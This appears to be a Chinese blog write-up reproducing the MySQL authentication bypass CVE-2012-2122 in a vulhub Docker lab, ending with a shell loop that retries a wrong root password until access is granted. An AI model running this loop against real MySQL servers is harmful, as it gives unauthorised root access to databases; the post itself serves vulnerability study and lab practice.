Mysql 身份认证绕过漏洞(CVE-2012-2122)

攻击机主机名:Mortor

靶机主机名:kali

漏洞介绍:当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。 也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。

实验步骤

在靶机搭建环境并启动容器

漏洞环境使用vulhub搭建,漏洞目录为vulhub/mysql/CVE-2012-2122

拉取镜像启动容器:docker-compose up -d

查看端口

环境启动后,将启动一个Mysql服务(版本:5.5.23),监听3306端口,可以在攻击机直接采用shell脚本进行攻击连接数据库

可以先进行正常连接看看是否成功: mysql -h IP -uroot -p123456

IP为存在此漏洞的kali的IP,即靶机

利用Shell脚本复现

在攻击机利用shell脚本通过循环对靶机发起连接请求:
for i in `seq 1 1000`; do mysql -uroot -pwrong -h <Ip> -P3306 ; done

可以看到在经过多次尝试后成功连接数据库,即复现成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值